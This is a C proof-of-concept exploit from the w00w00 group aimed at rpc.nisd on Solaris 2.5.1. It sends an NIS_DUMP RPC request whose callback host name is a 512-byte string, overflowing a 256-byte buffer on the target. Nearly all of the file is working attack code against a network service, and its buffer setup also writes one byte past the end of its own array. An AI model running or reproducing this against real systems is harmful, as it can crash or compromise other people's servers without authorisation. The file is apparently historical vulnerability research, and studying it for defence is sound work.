/* w00w00! */
/* This will test a vulnerability in rpc.nisd on Solaris 2.5.1 */
/* (and maybe other versions). See w00w00/vuls/nisvuls for     */
/* details.						       */
/* 							       */
/* This just takes one argument, the hostname. It will find    */
/* the port via portmapper.                                    */
/* 							       */
/* nis_clnt.c just takes two arguments. The second one is the  */
/* port that rpc.nisd is listening on (you can get this from   */
/* running:  rpcinfo -p <host>                                 */
/* 							       */
/* You would use the nis_clnt.c when the portmapper isn't      */
/* working (portmapper is for dorks).                          */
/* 							       */
/* Shok (Matt Conover), shok@dataforce.net            	       */

#include <stdio.h>
#include <stdlib.h>
#include <memory.h>

#include "nis.h"

/* Default timeout can be changed using clnt_control() */
static struct timeval TIMEOUT = { 60, 0 };


log_result *
nis_dump_3(argp, clnt)
	dump_args *argp;
	CLIENT *clnt;
{
	static log_result clnt_res;

	memset((char *)&clnt_res, 0, sizeof (clnt_res));
	if (clnt_call(clnt, NIS_DUMP,
		(xdrproc_t) xdr_dump_args, (caddr_t) argp,
		(xdrproc_t) xdr_log_result, (caddr_t) &clnt_res,
		TIMEOUT) != RPC_SUCCESS) {
		return (NULL);
	}
	return (&clnt_res);
}

void main(int argc, char **argv)
{
  CLIENT   *cl;
  register int i;

  log_result *result;

  char     buf[512];
  struct   dump_args da;

  if (argc < 2) {
     printf(" Usage: %s <host>\n", argv[0]);
     exit(1);
  }

  if ((cl = clnt_create(argv[1], NIS_PROG, NIS_VERSION, "tcp")) == NULL) {
     clnt_pcreateerror(argv[1]);
     printf("Try using nis_clnt1 (nis_clnt1.c) instead.\n");
     exit(1);
  }

  for (i = 0; i < sizeof(buf); i++) buf[i] = 'A';
  buf[++i] = '\0';

  /* Set up arguments. */
  bzero(&da, sizeof(da));

  /* make room for da_cbhost_val */
  da.da_cbhost.da_cbhost_val = (nis_server *)malloc(sizeof(nis_server));
  bzero(da.da_cbhost.da_cbhost_val, sizeof(nis_server));

  /* Buffer to overflow is MAXNETNAMELEN + 1, which is 256. */
  da.da_time = 1;                                   /* Anything > 0.  */
  da.da_dir  = "/tmp";                              /* Should work.   */
  da.da_cbhost.da_cbhost_len = 1;                   /* Must be one.   */
  da.da_cbhost.da_cbhost_val->name = strdup(buf);   /* Overflow here. */
  da.da_cbhost.da_cbhost_val->key_type = NIS_PK_DH; /* Must be this.  */

  result = nis_dump_3(&da, cl);

  if (result == NULL) {
     clnt_perror(cl, argv[1]);
     exit(1);
  }

  printf("All finished.\n");

  free(da.da_cbhost.da_cbhost_val->name);
  free(da.da_cbhost.da_cbhost_val);
}
